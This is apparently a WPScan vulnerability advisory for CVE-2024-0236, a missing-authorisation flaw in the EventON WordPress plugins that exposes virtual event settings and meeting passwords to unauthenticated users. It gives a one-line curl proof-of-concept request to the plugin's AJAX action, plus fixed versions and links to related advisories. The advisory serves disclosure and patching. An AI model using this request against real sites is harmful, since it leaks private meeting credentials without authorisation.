EventON (Free < 2.2.8, Premium < 4.5.5) – Unauthenticated Virtual Event Password Disclosure | CVE 2024-0236

Description

The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)

Proof of Concept

curl -X POST --data "eid=240" 'http://127.0.0.1/wp-admin/admin-ajax.php?action=eventon_config_virtual_event'

240 being the ID of a virtual event

Affects Plugins

eventON

Fixed in 4.5.5

eventon-lite

Fixed in 2.2.8

References

CVE

CVE-2024-0236

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

09aeb6f2-6473-4de7-8598-e417049896d7

Timeline

Publicly Published

2024-01-10 (about 4 months ago)

Added

2024-01-10 (about 4 months ago)

Last Updated

2024-01-10 (about 4 months ago)

Other

Published

Title

Published

2024-03-20

Title

Olive One Click Demo Import < 1.1.2 - Missing Authorization

Published

2023-12-26

Title

Sirv < 7.1.3 - Missing Authorization via sirv_disconnect

Published

2023-10-25

Title

My Shortcodes <= 2.3 - Missing Authorization via Multiple AJAX Actions

Published

2024-04-29

Title

Booster Extension <= 1.2.0 - Basic Information Exposure via booster_extension_authorbox_shortcode_display

Published

2023-09-12

Title

BAN Users <= 1.5.3 - Subscriber+ Settings Update & Privilege Escalation via Missing Authorization